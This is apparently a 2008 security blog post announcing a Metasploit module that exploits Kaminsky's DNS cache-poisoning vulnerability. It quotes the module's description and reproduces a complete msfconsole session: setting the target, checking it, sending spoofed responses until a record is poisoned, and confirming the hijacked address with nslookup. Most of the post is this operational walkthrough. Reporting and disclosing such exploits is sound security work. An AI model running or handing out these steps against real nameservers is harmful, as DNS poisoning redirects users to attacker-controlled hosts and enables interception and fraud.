As previously predicted, HD Moore has checked in an exploit for the DNS vulnerability originally discovered by Dan Kaminsky.  This auxiliary module is named "DNS BailiWicked Attack" (Auxiliary::Spoof::Dns::BailiWickedHost).  Written by |)ruid and hdm, this appears to be a fully functioning, easy to use exploit.

From the exploit module code:

This exploit attacks a fairly ubiquitous flaw in DNS implementations which
Dan Kaminsky found and disclosed ~Jul 2008.  This exploit caches a single
malicious host entry into the target nameserver by sending random sub-domain
queries to the target DNS server coupled with spoofed replies to those
queries from the authoritative nameservers for the domain which contain a
malicious host entry for the hostname to be poisoned in the authority and
additional records sections.  Eventually, a guessed ID will match and the
spoofed packet will get accepted, and due to the additional hostname entry
being within baliwick constraints of the original request the malicious host
entry will get cached.

More information on this exploit is available from "Computer Academic Underground".  Below is the example provided from that page:

# /msf3/msfconsole

                _                  _       _ _
               | |                | |     (_) |
_ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|

       =[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 72 aux

msf > use auxiliary/spoof/dns/bailiwicked_host
msf auxiliary(bailiwicked_host) > show options

Module options:

   Name      Current Setting    Required  Description
   ----      ---------------    --------  -----------
   HOSTNAME  pwned.doxpara.com  yes       Hostname to hijack
   NEWADDR   1.3.3.7            yes       New address for hostname
   RECONS    127.0.0.1          yes       Nameserver used for reconnaissance
   RHOST                        yes       The target address
   SRCPORT                      yes       The target server's source query port (0 for automatic)
   XIDS      10                 yes       Number of XIDs to try for each query

msf auxiliary(bailiwicked_host) > set RHOST A.B.C.D
RHOST => A.B.C.D

msf auxiliary(bailiwicked_host) > check
[*] Using the Metasploit service to verify exploitability...
[*]  >> ADDRESS: A.B.C.D  PORT: 48178
[*]  >> ADDRESS: A.B.C.D  PORT: 48178
[*]  >> ADDRESS: A.B.C.D  PORT: 48178
[*]  >> ADDRESS: A.B.C.D  PORT: 48178
[*]  >> ADDRESS: A.B.C.D  PORT: 48178
[*] FAIL: This server uses static source ports and is vulnerable to poisoning

msf auxiliary(bailiwicked_host) > set SRCPORT 0
SRCPORT => 0

msf auxiliary(bailiwicked_host) > run
[*] Switching to target port 48178 based on Metasploit service
[*] Targeting nameserver A.B.C.D
[*] Querying recon nameserver for doxpara.com.'s nameservers...
[*]  Got answer with 2 answers, 0 authorities
[*]  Got an NS record: doxpara.com.            172643  IN      NS      ns89.worldnic.com.
[*] Querying recon nameserver for address of ns89.worldnic.com....
[*]  Got answer with 1 answers, 0 authorities
[*]  Got an A record: ns89.worldnic.com.      172794  IN      A       205.178.190.45
[*] Checking Authoritativeness: Querying 205.178.190.45 for doxpara.com....
[*]   ns89.worldnic.com. is authoritative for doxpara.com., adding to list of nameservers to spoof as
[*]  Got an NS record: doxpara.com.            172643  IN      NS      ns90.worldnic.com.
[*] Querying recon nameserver for address of ns90.worldnic.com....
[*]  Got answer with 1 answers, 0 authorities
[*]  Got an A record: ns90.worldnic.com.      172794  IN      A       205.178.144.45
[*] Checking Authoritativeness: Querying 205.178.144.45 for doxpara.com....
[*]   ns90.worldnic.com. is authoritative for doxpara.com., adding to list of nameservers to spoof as
[*] Attempting to inject a poison record for pwned.doxpara.com. into A.B.C.D:48178...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Poisoning successful after 7000 attempts: pwned.doxpara.com == 1.3.3.7
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_host) >

msf auxiliary(bailiwicked_host) > nslookup pwned.doxpara.com A.B.C.D
[*] exec: nslookup pwned.doxpara.com A.B.C.D

Server:         A.B.C.D
Address:        A.B.C.D#53

Non-authoritative answer:
Name:   pwned.doxpara.com
Address: 1.3.3.7
 

Update: Three more changes to the module, including fixing spelling of "bailiwick", changing the default spoofed host to example.com (I'm sure Dan will appreciate that), and "better XID mixing", presumably for more efficient exploitation.